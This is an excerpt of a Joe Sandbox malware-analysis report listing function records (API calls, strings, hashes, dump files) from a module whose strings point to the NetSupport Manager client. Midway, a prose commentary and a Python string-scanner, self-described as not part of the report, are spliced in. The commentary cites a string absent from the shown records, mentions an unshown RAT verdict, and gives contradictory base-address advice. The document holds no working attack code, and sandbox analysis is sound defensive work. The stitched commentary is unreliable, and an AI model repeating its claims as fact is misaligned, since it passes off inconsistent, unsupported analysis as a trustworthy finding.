                                                                                      • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                      • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                      • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLock
                                                                                      • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                      • API String ID: 2752051264-327499879
                                                                                      • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                      • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                      • _strrchr.LIBCMT ref: 1114315A
                                                                                      • _strrchr.LIBCMT ref: 1114316A
                                                                                      • wsprintfA.USER32 ref: 11143185
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                      • String ID: BILD
                                                                                      • API String ID: 2529650285-1114602597
                                                                                      • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                      • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
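The three function records above carry strings compiled into the dumped module: the source path `e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h`, the source file `..\ctl32\Errorhan.cpp`, and the module name `NSMTRACE` passed to GetModuleHandleA. Paths under an `nsm` / `ctl32` build tree are consistent with the NetSupport Manager client code base, which is commercial remote-control software; the strings attribute the module at 0x11000000 to that product family, while the RAT verdict rests on how it was deployed, not on the strings alone. As an added example that is not part of the Joe Sandbox report, the Python below scans a memory dump (such as the `.sdmp` files listed in each record) for those three markers in both ASCII and UTF-16LE form, reports hits as virtual addresses relative to the module's 0x11000000 load address so they can be compared with the `ref:` addresses in the records, and requires two distinct markers before declaring a match, since any one of them alone is weak evidence. The sample buffer is constructed for the demonstration; no real dump is read.

```python
import re
from typing import Iterator, List, Tuple

# Product-identifying strings taken verbatim from the function records above.
NETSUPPORT_MARKERS = [
    rb"e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h",
    rb"..\ctl32\Errorhan.cpp",
    rb"NSMTRACE",
]


def _patterns(marker: bytes) -> Iterator[Tuple[str, "re.Pattern[bytes]"]]:
    """Yield (encoding, regex) for the ASCII and UTF-16LE forms of a marker.

    IGNORECASE on a bytes pattern folds ASCII letters only, which is exactly
    what is wanted here; the \\x00 bytes of the UTF-16LE form are unaffected.
    """
    yield "ascii", re.compile(re.escape(marker), re.IGNORECASE)
    wide = marker.decode("ascii").encode("utf-16-le")
    yield "utf-16le", re.compile(re.escape(wide), re.IGNORECASE)


def scan_dump(data: bytes, base: int = 0) -> List[Tuple[int, str, str]]:
    """Return (virtual_address, encoding, marker) for every marker hit.

    `base` is the load address of the dump; the report gives 0x11000000 for
    this module, so hits line up with the 'ref:' addresses in the records.
    """
    hits: List[Tuple[int, str, str]] = []
    for marker in NETSUPPORT_MARKERS:
        for enc, rx in _patterns(marker):
            for m in rx.finditer(data):
                hits.append((base + m.start(), enc, marker.decode("ascii")))
    return sorted(hits)


def classify(hits: List[Tuple[int, str, str]], minimum: int = 2) -> bool:
    """Treat the dump as NetSupport code only if `minimum` distinct markers hit."""
    distinct = {marker for _, _, marker in hits}
    return len(distinct) >= minimum


# Constructed sample: a fake dump with one ASCII marker and one UTF-16LE marker
# embedded in filler bytes. This is not data taken from the report.
SAMPLE_DUMP = (
    b"\x00" * 0x40
    + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h\x00"
    + b"\x90" * 0x20
    + "NSMTRACE".encode("utf-16-le") + b"\x00\x00"
    + b"\xcc" * 0x10
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP, base=0x11000000)
    for va, enc, marker in found:
        print(f"{va:08X} {enc:8} {marker}")
    print("NetSupport markers present:", classify(found))
```

To run this against the report's dumps, read each `.sdmp` file named in a record and pass its `Offset:` value as `base`; the `Source File` line of each record states the offset (0x11000000 here). Hits in the dump that starts at 0x11001000 should be given that start address as `base` rather than the PE image base.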
                                                                                      APIs
                                                                                      • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                      • _memmove.LIBCMT ref: 110653B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProfileString_memmove
                                                                                      • String ID: Device$No default printer,,LPT1:$Windows
                                                                                      • API String ID: 1665476579-2460060945
                                                                                      • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                      • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                      • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                      • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$VisibleWindow
                                                                                      • String ID: %d,%d,%d,%d,%d,%d
                                                                                      • API String ID: 1671172596-1913222166
                                                                                      • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                      • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                      • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                      APIs
                                                                                      Strings
                                                                                      • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$DeleteObject
                                                                                      • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                      • API String ID: 3011517232-3209293507
                                                                                      • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
                                                                                      • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                      • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                      APIs
                                                                                      • _memmove.LIBCMT ref: 110D1128
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                      • API String ID: 1528188558-323366856
                                                                                      • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                      • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                      • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                      APIs
                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                      • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                      • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoMoveParametersSystemTimerWindow
                                                                                      • String ID: Max
                                                                                      • API String ID: 1521622399-2772132969
                                                                                      • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                      • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                      • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 110ED118
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                      • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                      • API String ID: 2577986331-1331251348
                                                                                      • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                      • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                      • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
